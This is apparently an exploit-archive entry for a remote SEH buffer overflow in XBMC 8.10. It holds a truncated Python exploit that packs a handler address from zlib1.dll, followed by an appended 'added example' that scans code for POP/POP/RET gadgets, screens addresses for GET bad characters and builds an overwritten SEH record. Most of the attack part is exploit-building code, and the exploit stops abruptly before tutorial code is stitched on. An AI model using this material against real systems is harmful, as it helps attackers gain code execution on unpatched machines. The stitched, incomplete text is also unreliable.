XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)
#!/usr/bin/env python
'''
XBMC 8.10 GET request remote buffer overflow *SEH* (universal address)!!
Tested: Win XP SP2 Eng, Win Vista SP1
Vendor URL: http://xbmc.org/
Release date: April 4th, 2009
Versions affected: Windows, all versions.
I had tried for a while to get a nice pop ebx pop ret address and just
could not find a suitable one, especially one that was any good, and it
had to be shipped with the application and not have /SAFESEH.
To start with I looked at the zlib.dll to see if there were any
nice pop pop ret addresses. I noticed there was one in particular that
stood out and decided to try it.
There is no need for me to release any more exploits for this application,
as I have covered all the areas which I wanted to and want to
move on from this.
If you're interested to see how this worked, attach a debugger and add some
hit tracing :). It is possible to use this with all the buffer overflows
I released.
Credits to n00b for finding the buffer overflow and writing the
exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import struct

###
###This was found in the module zlib1 and is universal.
###zlib1.dll ships with the application and is not built with /SAFESEH, so the
###address is usable as the overwritten SEH handler. compressBound is a leaf
###function that returns with RET, so the sequence below behaves as POP POP RET:
###the two POPs discard the return address and the exception record pointer,
###and the RET lands on the establisher frame, i.e. the nSEH slot.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
SE_Handler = struct.pack('<L', 0x62E83BAC)  # handler address as a little-endian DWORD
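The gadget hunt described above (a POP/POP/RET-style sequence in a module that ships with the application and lacks SafeSEH) can be scripted. The Python 3 scanner below is an added example, not part of the original exploit nor of XBMC or zlib: it walks a raw code blob for POP r32; POP r32 followed by RET, RET imm16 or JMP rel32, reports the virtual address of each hit and, for the JMP form, where the jump lands. The code blob is constructed here to mirror the advisory's listing (the bytes 5B 5D E9 CD D9 FF FF placed at 0x62E83BAC); the image base 0x62E80000 and the other gadget offsets are assumptions for illustration, not real zlib1.dll contents. It also includes the bad-character check a GET-request payload needs and packs the handler the same way the exploit's SE_Handler line does.

```python
#!/usr/bin/env python3
"""POP/POP/RET gadget scanner for SEH overwrites (added example, not from the advisory).

The byte string below is CONSTRUCTED to mirror the zlib1.dll listing in the
advisory; the image base and the extra gadget offsets are assumptions.
"""
import struct

# Single-byte x86 POP r32 opcodes: 0x58 + register number
POP_REGS = {0x58 + n: reg for n, reg in enumerate(
    ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
RET, RET_IMM16, JMP_REL32 = 0xC3, 0xC2, 0xE9

# Assumed image base for the constructed blob (the advisory only gives 0x62E83BAC)
ASSUMED_BASE = 0x62E80000


def constructed_zlib1_text():
    """Stand-in for a slice of a .text section. NOT real zlib1.dll bytes."""
    buf = bytearray(b"\x90" * 0x4000)                      # NOP filler never matches a POP
    buf[0x3BAC:0x3BB3] = b"\x5b\x5d\xe9\xcd\xd9\xff\xff"   # pop ebx; pop ebp; jmp rel32 (advisory bytes)
    buf[0x1000:0x1003] = b"\x58\x5b\xc3"                   # pop eax; pop ebx; ret        (assumed)
    buf[0x1200:0x1203] = b"\x5c\x5d\xc3"                   # pop esp; pop ebp; ret -> must be rejected
    buf[0x1400:0x1405] = b"\x5e\x5f\xc2\x04\x00"           # pop esi; pop edi; ret 4      (assumed)
    return bytes(buf)


def find_ppr(code, base):
    """Return (address, mnemonic, jmp_target) for every POP r32; POP r32; {RET|RET n|JMP rel32}.

    jmp_target is None for the RET forms. A JMP form only helps if the target
    reaches a RET without disturbing ESP, which is what the advisory relies on
    for compressBound; confirm that in a debugger before using such a hit.
    """
    hits = []
    for i in range(len(code) - 2):
        r1, r2 = POP_REGS.get(code[i]), POP_REGS.get(code[i + 1])
        if r1 is None or r2 is None or "esp" in (r1, r2):
            continue                                       # POP ESP would move the stack
        op = code[i + 2]
        if op == RET:
            hits.append((base + i, f"pop {r1}; pop {r2}; ret", None))
        elif op == RET_IMM16 and i + 5 <= len(code):
            n = struct.unpack_from("<H", code, i + 3)[0]
            hits.append((base + i, f"pop {r1}; pop {r2}; ret 0x{n:x}", None))
        elif op == JMP_REL32 and i + 7 <= len(code):
            rel = struct.unpack_from("<i", code, i + 3)[0]
            target = (base + i + 7 + rel) & 0xFFFFFFFF     # rel32 is relative to the next instruction
            hits.append((base + i, f"pop {r1}; pop {r2}; jmp 0x{target:08x}", target))
    return hits


def address_usable(addr, bad=b"\x00\x0a\x0d\x20"):
    """True if the little-endian address survives an HTTP GET request line
    (no NUL, CR, LF or space among the packed bytes)."""
    return not any(b in bad for b in struct.pack("<L", addr))


def seh_record(nseh, handler):
    """Lay out the overwritten EXCEPTION_REGISTRATION: nSEH first, then the handler."""
    return nseh + struct.pack("<L", handler)


if __name__ == "__main__":
    for addr, mnem, _ in find_ppr(constructed_zlib1_text(), ASSUMED_BASE):
        print(f"{addr:08x}  {mnem}  usable_in_GET={address_usable(addr)}")
    # The hit at 0x62e83bac jumps to 0x62e81580, the address the advisory's
    # listing labels zlib1.compressBound under the assumed base.
    print(seh_record(b"\xeb\x06\x90\x90", 0x62E83BAC).hex())
```

For a real module, read the .text section bytes (for example with pefile) and pass the section's virtual address as the base; a hit is only worth using after confirming the module has no SafeSEH handler table and, as the author suggests, single-stepping it in a debugger.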